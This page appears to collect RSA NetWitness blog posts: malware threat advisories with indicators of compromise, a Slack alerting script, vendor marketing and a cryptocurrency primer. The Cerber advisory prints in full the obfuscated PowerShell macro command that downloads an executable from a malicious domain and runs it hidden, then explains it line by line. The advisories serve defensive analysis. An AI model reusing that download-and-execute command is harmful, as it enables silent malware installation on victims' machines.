
Malspam activity was noted on July 26 2017 delivering GlobeImposter ransomware. This threat advisory will shed some light on the activity from the perspective of NetWitness Packets and NetWitness Endpoint.


Scan results of a delivery document can be found here. Submitting the file to RSA's pre-release What's This File service shows the highest threat score with several suspicious characteristics:



Upon running the embedded VBA code, traffic was observed to a delivery domain to download an obfuscated payload:




This network behavior was shared among multiple infected machines:



The download sessions were tagged with the following meta values in NetWitness Packets: 



The downloaded payload is de-obfuscated and saved to the user's %Temp% directory as hurds8.exe:



VirusTotal scan results of that executable can be found here. Here is the analysis report from


The binary starts by copying itself to a new directory and by modifying the registry to gain persistency on the system:




It also drops and runs a batch script in the %TEMP% directory with typical instructions for ransomware:



The screenshot below shows part of the tracking history of an infected machine:



The following screenshot shows the module IIOCs for hurds8.exe as well as its tracking information:



Notice in the tracking data how the ransomware uses the .707 extension to rename the newly encrypted files. This GlobeImposter variant drops the following ransom note:



GlobeImposter delivery documents (SHA256):

  • 5d0eb492f4f36bfd871f6399dc777b9abb1436d18fdf7f1e737ff36ab86fb5b1
  • 4e4ded4a9aa9122594389adba17f4b6ad6ad5f37b1353274a69a09f737c03789


GlobeImposter ransomware variant (SHA256):

  • a1cde05bb37cecfecc2ccfb57807d2db66393d73c6e88e129507ffcb70f0ba2e


All the IOCs from those HTTP sessions were added to the FirstWatch Command and Control Domains feed on Live with the following meta values:

  • threat.source = 'rsa-firstwatch'
  • threat.category = 'malspam'
  • threat.description = 'delivery-domain'


As threats evolve it's important for organizations to keep pace. As part of this trend many organizations are moving to Slack for team communications and to help drive a more efficient operational workflow. You can use the NetWitness Suite to help drive some of the changes as well. In this post we'll look at how you can send ESA alerts from NetWitness to Slack using the 'run script' capability.


First start off by configuring Incoming Webhooks in Slack, you'll need to take note of the URL, Username and Channel that you configured your webhook for. These allow the script to communicate from NetWitness to Slack.


Next, in NetWitness, go to Configure -> ESA Rules and select the rule you want to add Slack notifications for. Then click on Global Notifications, this will allow you to add the script, notification server, and template.


On the Output tab, click the + sign and select Script. Paste the following into the box, give it a name and click save.





#!/bin/bash
# webhook_url, channel and username are the values noted when configuring the Slack webhook (placeholders below);
# the alert text is assumed to reach the script as its first argument
webhook_url="https://hooks.slack.com/services/PLACEHOLDER"; channel="#alerts"; username="NetWitness"; text="$1"

# escape backslashes and double quotes so the alert text stays a valid JSON string
escapedText=$(printf '%s' "$text" | sed 's/\\/\\\\/g; s/"/\\"/g')

json="{\"channel\": \"$channel\", \"username\":\"$username\", \"icon_emoji\":\":ghost:\", \"attachments\":[{\"color\":\"danger\" , \"text\": \"$escapedText\"}]}"

/usr/bin/curl -s -d "payload=$json" "$webhook_url"

Click the Servers tab. If you don't have an entry for 'Script', click the + sign, add one and click save. This allows scripts to be run on the local host (ESA server).

Next, you can use an existing template, but I created my own for simple alerting. You can do this by clicking on the Templates tab, then the + sign. Add the following information and click save.

Finally, select your new values in the rule, and deploy the modified ESA Rule(s).

Now you can enjoy your new Slack integration, and get alerts into various channels.
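As an added example (not the post's script), the Python below builds the same Slack payload with json.dumps, so quotes, backslashes and newlines in alert text need no hand-written sed escaping, and wraps it in the payload= form field the Incoming Webhook expects. The ESA alert field names are assumptions, and the actual send is left to curl or urllib as in the post.

```python
import json
from urllib.parse import parse_qs, urlencode


def alert_text(alert):
    """Render a constructed ESA alert dict into the message body.
    The keys (rule, src, dst, detail) are assumptions, not the ESA template schema."""
    return "Rule: {rule}\nSource: {src}\nDestination: {dst}\n{detail}".format(**alert)


def slack_payload(channel, username, text, color="danger"):
    """Same message shape as the post's script (channel, username, icon, one red attachment),
    but json.dumps handles every escape, including characters the sed approach misses."""
    message = {
        "channel": channel,
        "username": username,
        "icon_emoji": ":ghost:",
        "attachments": [{"color": color, "text": text}],
    }
    return json.dumps(message)


def webhook_form_body(payload_json):
    """Incoming Webhooks accept the JSON in a form field named `payload` (what the post's
    curl -d "payload=..." sends). urlencode keeps '&', '=' and '+' inside the alert text
    from being read as form-field separators."""
    return urlencode({"payload": payload_json})


def decode_form_body(body):
    """Reverse the encoding the way the webhook endpoint would; used to verify the round trip."""
    return json.loads(parse_qs(body)["payload"][0])


# Constructed alert with the characters that break naive shell escaping.
SAMPLE_ALERT = {
    "rule": 'Suspicious "exe" download',
    "src": "10.0.0.5",
    "dst": "payload.example",
    "detail": 'path=C:\\Users\\victim\\AppData\\Local\\Temp\\5356.exe & tag="exe filetype but not exe extension"',
}


def round_trip(alert=SAMPLE_ALERT, channel="#soc-alerts", username="NetWitness"):
    """Build, encode and decode one alert; returns what Slack would see."""
    body = webhook_form_body(slack_payload(channel, username, alert_text(alert)))
    return decode_form_body(body)


if __name__ == "__main__":
    print(json.dumps(round_trip(), indent=2))
```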

Malspam activity was noted on July 20 2017 delivering the BEBLOH banking trojan. BEBLOH has been around since 2009 and has the ability to steal money from unsuspecting victims right off their bank accounts [1]. Based on the observed delivery documents, it seems this campaign is targeting users in Japan.


Scan results of a delivery document can be found here. Here is a screenshot taken of the malicious spreadsheet:



Submitting the spreadsheet to RSA's pre-release What's This File service shows maximum threat score:



What's This File service also shows the embedded VBA code:



Here is the host behavior upon opening the delivery document on a machine with RSA NetWitness Endpoint agent installed:



Obfuscated PowerShell code is used to download an executable to a local directory. The screenshot below shows the download activity in RSA NetWitness:




VirusTotal scan results of the downloaded executable suggest it is a BEBLOH variant. The EXE is saved to the user's Documents folder as %appdata%.exe.



Here is the process tree:



The download sessions are tagged with several meta values in RSA NetWitness, including http two headers, http no referer, http no user-agent and http get no post under Service Analysis, and exe filetype under File Analysis.



BEBLOH delivery documents (SHA256):

  • fc0d7e53b0d55232a4a89614841ec77f022aab845a08dd4cbc47d3d6d35fc641
  • d82f57b4ab676ae02c710becedf9a0883f935fee89abf98c010c1a8b122b7140
  • 87d3eb0c512568c3cbe931670680b77d3f039312279f6817542dc612619d6449


BEBLOH Trojan (SHA256):

  • 29c7740f487a461a96fad1c8db3921ccca8cc3e7548d44016da64cf402a475ad


All the IOCs from those HTTP sessions were added to the FirstWatch Command and Control Domains feed on Live with the following meta values:

  • threat.source = 'rsa-firstwatch'
  • threat.category = 'malspam'
  • threat.description = 'delivery-domain'



  1. BEBLOH Expands to Japan in Latest Spam Attack - TrendLabs Security Intelligence Blog

During the early weeks of July, malspam activity delivered a malicious word document, which uses macros to download and execute a Cerber ransomware payload. This is not a new exploitation vector. Macros are often abused to perform malicious tasks, like downloading and dropping malware. Victims can easily be tricked into running the malicious macro.



Submitting the delivery document to What's This File service shows more information about the malicious word document.



The process tree below also captures this activity and shows the series of events that led to downloading and executing a Cerber payload:



The macro in our MS Word Document calls PowerShell to connect to the malware’s distribution website to download and run an executable:


powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'http://dastonond[.]top/admin.php?f=1.jpg'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}


Line-By-Line analysis of PowerShell Command:


  • First line of the command opens the PowerShell application from the Windows System32 directory

-WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;

  • Opens PowerShell as a hidden window so it is not visible to the victim.
  • The variable “$wscript” is created and assigned to the created WScript.Shell instance. 
  • WScript.Shell provides access to the OS shell methods, which substantially increases the capabilities and the types of applications that PowerShell can interact with.

$webclient = new-object System.Net.WebClient;

  • The variable $webclient is created and is given a System.Net.WebClient instance. 
  • The WebClient class provides a list of methods that allow the instantiated object to send and receive data from web servers identified by a URL.

$random = new-object random;

  • This command simply creates a new instance of a random object ($random).

$urls = 'http://dastonond[.]top/admin.php?f=1.jpg'.Split(',')

  • The $urls variable is assigned to a malicious binary hosted on a malicious domain. 
  • This variable is also capable of stringing together multiple binaries hosted on different domains by simply separating the different URLs with commas. 

$name = $random.next(1, 65536);

  • The $name variable is assigned a random number from the $random variable between 1 and 65536.

$path = $env:temp + '\' + $name + '.exe';

  • The $path variable is set to the Windows environment variable directory which points to the user’s AppData temp folder. 

foreach($url in $urls){try{

  • The script iterates through each URL given in the $urls variable and runs the subsequent commands on it.

$webclient.DownloadFile($url.ToString(), $path);

  • The $webclient variable is used to download a file from the website in the $urls variable to the path specified in the $path variable. 

Start-Process $path;break;}

  • Executes the downloaded file and then breaks out of the loop. If the command fails to return a process, the script continues silently; the window remains hidden throughout.

catch{write-host $_.Exception.Message;}

  • This is another mechanism to keep the script running silently in the background.


In our case, it downloads a JPG file. Well, it is actually a PE file saved to C:\Users\<user>\AppData\Local\Temp\5356.exe. It runs and starts to spawn a number of processes to gather information and to encrypt files on the infected system.



VirusTotal analysis of the dropped file confirms it is Cerber ransomware:



Once the ransomware has successfully installed, post-infection traffic shows typical Cerber beaconing UDP spray out to 77.12.57/24 on port number 6893.



Current NetWitness detection flags both payment domain (key.dga.tld pattern) as 'cerber ransomware' and the UDP spray as 'cerber beacon' in the <Indicators of Compromise> meta field. 
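As an added illustration (not part of the original advisory or of NetWitness), the Python below flags the 'cerber beacon' UDP spray pattern described above in constructed flow records: one source hitting many distinct addresses inside a single /24 on port 6893 within a short window. The flow tuple layout, the thresholds and the use of 203.0.113.0/24 as a stand-in for the sprayed range are assumptions.

```python
import ipaddress
from collections import defaultdict

CERBER_PORT = 6893  # UDP port used by the beacon spray described in this advisory

# Constructed flow records: (src_ip, dst_ip, protocol, dst_port, timestamp_seconds).
# 203.0.113.0/24 (TEST-NET-3) stands in for the sprayed /24; nothing here is real capture data.
SAMPLE_FLOWS = (
    # infected host: 40 distinct targets in one /24, one packet per second
    [("10.0.0.5", f"203.0.113.{i}", "udp", CERBER_PORT, 100 + i) for i in range(1, 41)]
    # benign host: 50 DNS queries, but all to a single resolver
    + [("10.0.0.7", "198.51.100.53", "udp", 53, 100 + i) for i in range(50)]
    # host touching only a handful of addresses in the same /24 (below threshold)
    + [("10.0.0.9", f"203.0.113.{i}", "udp", CERBER_PORT, 100 + i) for i in range(1, 6)]
    # same 40 targets, but spread over an hour, so never many inside one window
    + [("10.0.0.11", f"203.0.113.{i}", "udp", CERBER_PORT, 100 + 90 * i) for i in range(1, 41)]
)


def udp_spray_sources(flows, port=CERBER_PORT, min_targets=16, window=60):
    """Return {src: (subnet, distinct_targets)} for sources that reach at least
    `min_targets` distinct addresses within one /24 on `port` inside any
    `window`-second interval.  Distinct destinations, not packet volume, are the
    signal: a chatty client talking to a single server never trips this."""
    by_key = defaultdict(list)  # (src, /24) -> [(ts, dst), ...]
    for src, dst, proto, dport, ts in flows:
        if proto != "udp" or dport != port:
            continue
        subnet = ipaddress.ip_network(f"{dst}/24", strict=False)
        by_key[(src, str(subnet))].append((ts, dst))

    hits = {}
    for (src, subnet), events in by_key.items():
        events.sort()
        best = 0
        # sliding window: count distinct destinations reachable from each start event
        for i, (t0, _) in enumerate(events):
            targets = {dst for ts, dst in events[i:] if ts - t0 <= window}
            best = max(best, len(targets))
        if best >= min_targets:
            hits[src] = (subnet, best)
    return hits


if __name__ == "__main__":
    for src, (subnet, count) in udp_spray_sources(SAMPLE_FLOWS).items():
        print(f"{src} sprayed {count} hosts in {subnet} on udp/{CERBER_PORT}")
```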



Additionally, <File Analysis> flags for 'js eval no docwrite' and 'exe filetype but not exe extension' should be noted as indicators of possibly malicious files.



All the IOCs are added to the following feeds on Live:

  • RSA FirstWatch Command and Control Domains
  • RSA FirstWatch Command and Control IPs

For more information on Cerber ransomware, its evolution and detection techniques using RSA NetWitness, please check the following RSA Link articles:



Thanks go to Ahmed Sonbol and Kevin Stear for contributing to this threat advisory.





The cloud is becoming the go-to infrastructure of choice for enterprises worldwide. Why? First and foremost, cloud computing has significantly more flexibility when it comes to scale. If you are leveraging Amazon Web Services (AWS), it takes minutes to spin up an EC2 instance, whereas expanding on-premises infrastructure can take weeks or months. Secondly, organizations can save on infrastructure costs and resources with the cloud and shift budgets to other areas as needed. But despite the obvious benefits the cloud brings, it is still important to have effective security policies in place to protect workloads no matter where they reside.


That is why Gigamon and RSA have come together to create a joint integrated solution for AWS customers. Let’s hear from Sesh Sayani, director of product management – cloud at Gigamon, to learn more about what Gigamon and RSA can offer to enterprises moving to AWS. 


What kind of challenges are you seeing from customers who are moving to the cloud?

When organizations first started moving to the cloud, they were migrating their Tier 2/3 applications and workloads. Now, as on-premises infrastructure cost and complexity continue to rise, enterprises are beginning to move their mission-critical applications to the cloud as well.


This “lift and shift” of Tier 1 applications, however, has raised eyebrows, especially by security architecture teams. When moving to the cloud, enterprises lose visibility into traffic in and out of their workloads. Security teams are concerned about gaining the necessary insight in order to maintain effective forensics, prevent accidental data loss and prepare for security incident responses.


Endpoint or malware protection is not sufficient to gain full application insight. To get full visibility, deep packet inspection is required for effective forensics, analysis and protection.  To address this, agents can be deployed in the workloads for traffic inspection. But, for a comprehensive security posture, multiple tools may be required – for example, IDS, SIEM, DLP. Adding so many agents in the workloads is neither a scalable nor cost-effective approach to address this challenge.


Can you please tell us a bit about the Gigamon Visibility Platform and the benefits for Amazon Web Services (AWS) customers?

The Gigamon Visibility Platform is the first pervasive visibility solution for the cloud that provides full and deep traffic visibility into your workloads in AWS. This platform is made up of three main elements:

  • GigaVUE-FM Fabric Manager: Orchestration component that ensures scale, automation and elasticity across your AWS deployments.
  • GigaVUE V Series: Virtual visibility nodes deployed as AMIs, used to aggregate traffic across multiple EC2 instances and send customized traffic to multiple security tools as needed.
  • G-vTAP agents: Used to gain access to the traffic from the EC2 instances to the GigaVUE V Series nodes.


The Gigamon Visibility Platform can be deployed either on-premises or in AWS. That means organizations don’t have to duplicate the tools they are running on-premises and in the cloud. Let’s take a quick look at an example. If you are running tools on-premises, you don’t want to be forced to deploy additional tools in the cloud because this will drive up cost and the need for resources. Instead, deploy the Gigamon Visibility Platform on-premises and backhaul network traffic of interest to your on-premises tools.


Gigamon and RSA have been partners for a while – what are your thoughts on this partnership?

It’s a great partnership and one that we want to continue to expand. RSA is a recognized industry leader in security and now that we both have solutions available for AWS, we can jointly provide a highly scalable, flexible offering that provides visibility and security for our customers across physical, virtual and public cloud deployments.


How does Gigamon integrate with RSA on AWS and what are the benefits to customers?

The Gigamon Visibility Platform for AWS includes our lightweight G-vTAP agent, which is deployed on different EC2 instances. The agent copies the network packets, which are aggregated in the GigaVUE V Series node where we apply traffic intelligence and then send the desired network traffic to the RSA NetWitness Suite decoder for deep content inspection. The benefit to customers is full packet capture across compute instances, which provides RSA NetWitness Suite with the ability to identify and mitigate potential threats faster.


Gigamon and RSA have put together a joint Test Drive – why would this be exciting for customers?

A Test Drive is a great way for our customers to see first-hand how these solutions work and perform in an AWS environment. With this joint Test Drive, customers can see how the Gigamon Visibility Platform provides automated insight into AWS workloads, applies GigaSMART traffic intelligence and distributes copies of traffic. Additionally, customers can see how the RSA NetWitness Suite gathers traffic from the Gigamon Visibility Platform to investigate / identify potential threats to your AWS applications and workloads.


Want to learn more?


If you’re attending Black Hat July 26-27, come check out the RSA booth #907 to speak to Gigamon and RSA product experts.


You can also join us at Gigamon's Cloud Field Day 2. Register today!

With today’s ever growing threat landscape, the volume, sophistication, and potential damages of attacks is increasing. It is becoming increasingly harder to stop attackers from entering your system networks, isolating their motives, and most importantly removing them once they are there.  A typical security environment uses multiple disconnected technologies, supplying an immense amount of information.  Prioritizing a specific piece of data is important to responding quickly to attacks.  At a higher level, however, there is a need to understand if the security strategy is really effective for the business.  In summation, businesses need to change their security strategies.


The solution?  RSA provides a top-down approach strategically linking business risk management with security events and priorities:

  • Make security teams operationally more impactful
  • Strategically manage business risk

By bringing different practices together, linking security incidents with business context allows security teams to respond faster to protect what matters most.

The RSA suite of tools

  • Keeps the bad actors out, but allows entry to those that have legitimate need to easily access the system
  • Enables visibility and analytics to view the big picture to provide insights into specific attacks
  • Provides business context linked to contextual intelligence for a more informed approach, which can then be translated into action

The video in this eLearning discusses how RSA’s tools provide both the detailed information linked to the business context to protect the most sensitive assets.

The idea of a mathematically secure chain of blocks was first mentioned in 1991, first conceptualized as digital currency in 1998 as "Bit Gold" and first implemented as decentralized digital currency as "Bitcoin" in 2009.


Blockchain is nothing but a chronological chain of blocks where every block contains a set of transactions/records and a reference to the previous block. This idea of a blockchain helps in establishing a digital ledger which is immutable and can be distributed in a way that peers in the network can come to a global consensus on adding new blocks and also agree on the true state of the ledger. This ledger is not kept in one place; its copies are held by all the participants in the distributed network. These copies are updated at the same time when all the participants come to a consensus. The privacy and anonymity depend upon the implementation of the blockchain.


Blockchain can be implemented in many areas such as finance, banking and real estate. There are a wide variety of implementations already in the market. However, the biggest implementation is in the field of cryptocurrency. There are many cryptocurrencies available and two major currencies are Bitcoin and Ethereum.

Bitcoin is a digital payment system and a cryptocurrency. It can be used for transactions all over the world with no central authority or bank involved. There are participant nodes in Bitcoin network that have the copies of Bitcoin distributed ledger. Six times every hour, a group of transactions is collected in a block and that block is added to the blockchain. Then all the participating nodes are synced with this change in the blockchain.


Adding new blocks to the chain is called mining. The miners do the following:

  1. They verify that the transactions are valid, which helps resolve the double-spending problem (i.e. the same digital token being spent twice).
  2. They group transactions into a block.
  3. They put a reference to the most recent block into the new block about to be created.
  4. They solve a mathematical proof-of-work problem. This is the step where the race between all the miners starts; the winner adds the new block to the chain and receives funds in the mined currency as a reward.
  5. When the mathematical problem is solved, the new block is added and the change is communicated across the network to all participating nodes.
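To make the five steps above concrete, here is an added toy implementation (not part of the original post and far simpler than Bitcoin's real rules): transaction validation against balances, grouping into a block that references the previous block's hash, a SHA-256 proof of work, and the chain check every node runs. The difficulty, the genesis balances and the transaction format are assumptions.

```python
import hashlib
import json

DIFFICULTY = 3                    # required number of leading hex zeros in a block hash
GENESIS_BALANCES = {"alice": 10}  # constructed starting ledger state, not real data


def block_hash(block):
    # Hash only the committed fields, in canonical order, so every node computes the same value.
    fields = {k: block[k] for k in ("index", "prev_hash", "transactions", "nonce")}
    return hashlib.sha256(json.dumps(fields, sort_keys=True).encode()).hexdigest()


def apply_transactions(transactions, balances):
    """Step 1: reject a block whose transactions overspend a balance (the double-spend
    case). Returns the updated balances, or None if the block is invalid."""
    balances = dict(balances)
    for tx in transactions:
        if balances.get(tx["from"], 0) < tx["amount"]:
            return None
        balances[tx["from"]] -= tx["amount"]
        balances[tx["to"]] = balances.get(tx["to"], 0) + tx["amount"]
    return balances


def mine_block(index, prev_hash, transactions, difficulty=DIFFICULTY):
    """Steps 2-4: bundle the transactions with a reference to the previous block, then
    search for a nonce whose hash meets the proof-of-work target."""
    block = {"index": index, "prev_hash": prev_hash,
             "transactions": [dict(tx) for tx in transactions], "nonce": 0}
    while not block_hash(block).startswith("0" * difficulty):
        block["nonce"] += 1
    block["hash"] = block_hash(block)
    return block


def build_chain(batches, difficulty=DIFFICULTY):
    chain = [mine_block(0, "0" * 64, [], difficulty)]  # genesis block
    for transactions in batches:
        chain.append(mine_block(len(chain), chain[-1]["hash"], transactions, difficulty))
    return chain


def validate_chain(chain, difficulty=DIFFICULTY, balances=GENESIS_BALANCES):
    """Step 5, from the receiving node's side: each block's stored hash must match its
    contents and meet the target, each block must reference its predecessor's hash, and
    no transaction may overspend. Editing one block invalidates it and every block after it."""
    for i, block in enumerate(chain):
        if block["hash"] != block_hash(block) or not block["hash"].startswith("0" * difficulty):
            return False
        if i > 0 and block["prev_hash"] != chain[i - 1]["hash"]:
            return False
        balances = apply_transactions(block["transactions"], balances)
        if balances is None:
            return False
    return True


SAMPLE_BATCHES = [
    [{"from": "alice", "to": "bob", "amount": 5}],
    [{"from": "bob", "to": "carol", "amount": 2}],
]
DOUBLE_SPEND_BATCHES = [
    [{"from": "alice", "to": "bob", "amount": 5}],
    # bob holds 5 but tries to spend it twice
    [{"from": "bob", "to": "carol", "amount": 5}, {"from": "bob", "to": "dave", "amount": 5}],
]


def tamper_demo(remine=False):
    """Edit a committed transaction and return (valid_before, valid_after). With remine=True
    the editor redoes block 1's proof of work, but block 2 still references the old hash."""
    chain = build_chain(SAMPLE_BATCHES)
    valid_before = validate_chain(chain)
    chain[1]["transactions"][0]["amount"] = 7  # still within alice's balance
    if remine:
        chain[1] = mine_block(1, chain[0]["hash"], chain[1]["transactions"])
    return valid_before, validate_chain(chain)


if __name__ == "__main__":
    print("tamper only:", tamper_demo(), "tamper and re-mine:", tamper_demo(remine=True))
```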


The following graph by PwC can help you in understanding the flow of a transaction in the world of cryptocurrency [1].




With the rise of ransomware in the past couple of years, cryptocurrency and in particular Bitcoin gained more popularity. Due to the level of anonymity it provides, Bitcoin became the criminals’ preferred currency to receive the ransom, thus playing an important part in the ransomware ecosystem. In the aftermath of a ransomware attack, victims hasten to follow the criminals' instructions in order to buy bitcoins and pay the ransom to recover their files. There is no guarantee that a victim would get their data back, and the general advice is not to pay the ransom [2]. However, for some organizations that fall victim to those attacks that is not an option, and they are more willing to take the risk. In fact some companies started stockpiling Bitcoins in anticipation of ransomware attacks so they can recover their data as quickly as possible [3].


Another threat to organizations is the rise of cryptocurrency mining malware. This class of malicious software infects a victim machine and enrolls it in a larger mining botnet. Cryptocurrency mining uses a lot of system resources and might degrade the machine's performance. Recently Proofpoint security researchers released a report about the Adylkuzz cryptocurrency mining malware [4]. Adylkuzz was spreading via the EternalBlue/DoublePulsar exploits and was used to mine Monero, a cryptocurrency that has enhanced anonymity capabilities and is used in dark web markets.


Cryptocurrency is not a new technology but as it is getting more attention, it is our hope that this post can help in answering some of the basic questions. Future advisories will cover any emerging threats in that domain and will shed some light on detection techniques using RSA technologies.


Thanks to Prakhar Pandey for contributing to this blog post.




This RSA University Navigator is part of an ongoing campaign by RSA University to make it easier for RSA NetWitness customers like you to find relevant product training. The RSA University Navigator allows you to filter content based on your role within your organization, the skills you would like to develop, and your expertise using RSA NetWitness.


The RSA NetWitness Suite Navigator will be updated frequently to ensure you are receiving the most up-to-date content available. There is a dedicated team of RSA professionals at RSA University here to help you take charge and power your way to success with the RSA NetWitness Suite. Over time, we will also update this tool to include NetWitness Endpoint Training.


In our continued efforts to provide the best content available, we rely on your feedback. If you cannot find what you are looking for in the Navigator, please reach out to our team by contacting us:


 You can find the RSA University Navigator Tool on the main RSA University page or by navigating to the following URL:

We know you really want to join the more than 2,000 security, risk and compliance professionals at the premier Business-Driven Security event, RSA Charge 2017, Oct. 17-19 in Dallas. Now you have one final, limited opportunity to enjoy a $300 savings with our ‘throwback’ to the Early Bird Discount Rate of $645.


This is your opportunity to network with RSA customers, partners, and industry experts while discovering how to implement a Business-Driven Security  strategy in an increasingly uncertain high-risk world.


Use the Throwback Thursday code 87CTHRWBCKJUL and save $300 on your attendee pass.


Need a little more convincing, in addition to the $300 savings? Well, we have this covered too!


Check out our latest Keynote Lineup, including

  • Marc Goodman, Global Security Advisor and Futurist, will explain how to cultivate an informed workforce to create a human firewall, in what promises to be a highly engaging and humorous keynote presentation


Sneak Peek at our Upcoming Agenda of robust programming you can expect at RSA Charge 2017. Tracks include:

  • Taking Command of Your Risk Management Journey
  • Transforming Compliance
  • Managing Technology Risk in Your Business
  • Inspiring Everyone to Own Risk
  • Detecting and Responding to Threats That Matter
  • Secrets of the SOC
  • Identity and Access Assurance
  • Reducing Fraud, While Not Reducing Customers
  • RSA Archer Technical
  • RSA Archer Technical, Advanced


Don’t miss out on your chance to attend RSA Charge 2017 with the limited ‘Throwback Thursday’ event. Use code 87CTHRWBCKJUL to register.


Discount code expires Thursday, July 27, 2017, at 11:59 PM PST. Offer cannot be combined with any other promotional code.


In the early weeks of July 2017, the Necurs botnet supported a large malspam campaign delivering TRICKBOT via macro-enabled MS Word documents.  While multiple documents were noted in Virus Total submissions, Lloyds Bank was specifically used/mentioned within one decoy document entitled "Protected.doc".




These documents all contain macros with malicious VB Scripting that maxes out scoring in RSA's pre-release, as shown below.  Note the three findings of interest: "Document Contains VBA Code", "VBA Code Contains Auto-Launch Scripts", and "VBA Code Contains Reference to Launching EXEs".  These are all bad things...



Upon opening, the attachment downloads a PNG file that is actually an executable; this is the TRICKBOT payload.  In several instances, we observed multiple download domains involved with this delivery.  In the case below, the first download domain (rbsbuilding[.]co[.]uk) fails with a 404 and a second download domain, ccbenelux[.]nl, successfully delivers our payload, baglosnot32tritony.png.



Post infection, we did not observe TRICKBOT Command and Control (C2) in our own sandbox detonations (probably due to a delay prior to the beginning of periodic 3 minute beaconing).  However, we did note probable C2 check-in behavior in related Virus Total PCAPs, specifically TCP SYNs out to a number of known related IP addresses.




This beaconing was also easily observed in NetWitness Endpoint (aka ECAT), where a telling screenshot shows "butrz.exe" creating a suspect "svchost" process every 3 minutes.



ECAT also flags a number of IOCs that warrant concern.



With regard to the packet detection of TRICKBOT, NetWitness meta data clearly identifies behavior indicative of malicious activity.  Specifically, our macro-enabled MS Word document produces meta for session.analysis of "first carve not dns", service.analysis of "http no user-agent" and "http no referrer", and file.analysis of "exe filetype but not exe extension".  These are all strong indicators that something malicious is going down.
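As an added example (not NetWitness code or the author's), covering the service and file analysis meta named here and in the Cerber, BEBLOH and GlobeImposter advisories earlier on this page, the Python below derives the same tags from constructed HTTP sessions: missing User-Agent and Referer request headers, exactly two request headers, and a response body that starts with the MZ executable magic while the URL claims a .jpg or .png. The session layout, the stub PE bytes and the reading of "http two headers" as exactly two request headers are assumptions.

```python
import posixpath
from urllib.parse import urlsplit

EXE_EXTENSIONS = {".exe", ".dll", ".scr", ".com", ".sys"}

# Constructed DOS-header stub: the two magic bytes plus padding, not a real executable.
FAKE_PE = b"MZ\x90\x00" + b"\x00" * 60


def analyze_session(url_path, request_headers, response_body):
    """Return the set of analysis tags one request/response pair earns. Header names
    are compared case-insensitively; the file type comes from the body's magic bytes,
    never from the URL, which is the whole point of the extension-mismatch check."""
    names = {name.lower() for name in request_headers}
    tags = set()
    if "user-agent" not in names:
        tags.add("http no user-agent")
    if "referer" not in names:
        tags.add("http no referrer")
    if len(request_headers) == 2:  # assumption: this is what "http two headers" means
        tags.add("http two headers")
    if response_body[:2] == b"MZ":
        tags.add("exe filetype")
        # look at the path only, so ?f=1.jpg style query strings cannot fake an extension
        ext = posixpath.splitext(urlsplit(url_path).path)[1].lower()
        if ext not in EXE_EXTENSIONS:
            tags.add("exe filetype but not exe extension")
    return tags


# Constructed sessions modelled on the downloads described on this page (hosts are examples).
SAMPLE_SESSIONS = {
    "cerber_style": dict(
        url_path="/admin.php?f=1.jpg",
        request_headers={"Host": "payload.example"},
        response_body=FAKE_PE,
    ),
    "trickbot_style": dict(
        url_path="/baglosnot32tritony.png",
        request_headers={"Host": "payload.example", "Cache-Control": "no-cache"},
        response_body=FAKE_PE,
    ),
    "browser": dict(
        url_path="/index.html",
        request_headers={"Host": "www.example.com", "User-Agent": "Mozilla/5.0",
                         "Referer": "https://www.example.com/", "Accept": "text/html"},
        response_body=b"<html></html>",
    ),
    "installer": dict(
        url_path="/downloads/setup.exe",
        request_headers={"Host": "www.example.com", "User-Agent": "Mozilla/5.0",
                         "Referer": "https://www.example.com/downloads"},
        response_body=FAKE_PE,
    ),
}


def tag_all(sessions=SAMPLE_SESSIONS):
    return {name: analyze_session(**session) for name, session in sessions.items()}


if __name__ == "__main__":
    for name, tags in tag_all().items():
        print(f"{name}: {sorted(tags)}")
```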



As referenced in the opening, this activity appears to be part of a larger ongoing TRICKBOT campaign; below is some related activity we have observed thus far in the month of July.



All related IOCs have been pushed to the FirstWatch_C2_Domains and FirstWatch_C2_IPs feeds and are available to customers via RSA Live.  Thanks to Ahmed Sonbol, Christopher Ahearn and Prakhar Pandey for their assistance with this analysis.



Thanks for the banner picture @Vitali Kremez (@VK_Intel) | Twitter.

Despite increasing investments in security, breaches are still occurring at an alarming rate. Whether the result of cyber criminals sending phishing or malware attacks through company emails, nation states targeting organization’s IP, or insiders misusing sensitive data, we live in a world where prevention of breaches has become impossible. Given the speed at which cyber criminals are able to create new security threats, companies must change their approach to security.  It is time for the centerpiece of our security operation to evolve – for SIEM to finally deliver what it has promised for decades.


We are thrilled to announce, that is exactly what we are delivering. We’ve redefined modern security operations with a new kind of SIEM: the RSA NetWitness® Suite. 


Of course, we have all the traditional SIEM requirements like compliance; but it is built to be laser focused on security – to rapidly detect and respond to today’s known and unknown threats – before they do damage.


The latest release of the RSA NetWitness Suite delivers end to end visibility across the organization – from logs, network, endpoints and threat intelligence - in a brand new, highly intuitive and blazing fast user interface. The new user interface was designed from the ground up after 100s of hours of security analyst interviewing and testing. The new Respond and Investigate workflows make it easy for security analysts to triage information rapidly because they have all the information they need in one screen - and will make threat hunters even more impactful by providing them insights and drills into all the data, business context and threat intelligence they need. From novice to hunter – these workflows will make any security analyst better at defending their networks. 


RESPOND: Interactive Nodal

We continue to focus on improving the efficiency and effectiveness of security analysts of all levels, by providing out of the box machine learning and behavior analytics for alerting and detection and by prioritizing the most important incidents based on business risk – from identity and asset criticality data. The new RSA NetWitness Suite is a force multiplier for security analysts and incident responders.


Ultimately, the RSA NetWitness Suite enables analysts to detect and investigate the full scope of an attack and more rapidly respond to those threats that matter the most to an organization.


You need to see it for yourself. You can learn more by visiting:

During the first week of July 2017, malspam activity was observed delivering AgentTesla malware, a spyware capable of key and clipboard logging, screen capture, and stealing passwords from browsers [1][2]. This threat advisory will discuss its delivery methods and traffic analysis using NetWitness Logs and Packets.


The observed delivery document, named “document.doc”, was originally uploaded to Virus Total on July 7th. This MS Word document contains embedded and obfuscated macros written in VBA, which are auto-launched upon opening. When submitted to RSA’s pre-release What's This File service, the document received the maximum threat score.



As indicated below, the cleansed VBA code contained within the document uses Document_Open to auto-launch the script and then Shell to launch an executable.



Following the process tree, powershell.exe is called to download “filenew.exe” from findmylogs[.]com and save the payload, a malicious executable saved as “prcQE.exe” in the “\AppData\Local\Temp” folder.





NetWitness packet inspection flags the following meta data from this activity.



